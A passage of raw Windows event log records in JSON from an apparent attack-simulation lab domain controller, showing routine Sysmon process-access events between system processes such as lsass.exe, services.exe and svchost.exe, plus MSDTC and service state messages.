05:48:46.984","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3687,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3688,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3689,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010907D0500}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010907D0500}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010907D0500}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010907D0500}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010907D0500}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010907D0500}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.109\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010907D0500}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010907D0500}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4202,"SourceName":"Microsoft-Windows-MSDTC 2","ProviderGuid":"{5D9E0020-3761-4F36-90C8-38CE6511BD12}","Version":0,"Task":2,"OpcodeValue":0,"RecordNumber":12116,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"MSDTC started with the following settings:\r\r Security Configuration (OFF = 0 and ON = 1):\r Allow Remote Administrator = 0,\r Network Clients = 0,\r Transaction Manager Communication: \r Allow Inbound Transactions = 0,\r Allow Outbound Transactions = 0,\r Transaction Internet Protocol (TIP) = 0,\r  Enable XA Transactions = 0,\r  Enable SNA LU 6.2 Transactions = 1,\r  MSDTC Communications Security = Mutual Authentication Required,\r Account = NT AUTHORITY\\NetworkService,\r  Firewall Exclusion Detected = 0\r\r Transaction Bridge Installed = 0\r Filtering Duplicate Events = 1\r","Category":"TM","param1":"0","param2":"0","param3":"0","param4":"0","param5":"0","param6":"0","param7":"1","param8":"Mutual Authentication Required","param9":"NT AUTHORITY\\NetworkService","param10":"0","param11":"0","param12":"1","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":900,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12117,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service is starting.\r\nParameters:<none>","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76841,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Connected Devices Platform Service service entered the stopped state.","param1":"Connected Devices Platform Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76842,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The DPS service entered the running state.","param1":"DPS","param2":"running","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76843,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The MapsBroker service entered the running state.","param1":"MapsBroker","param2":"running","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 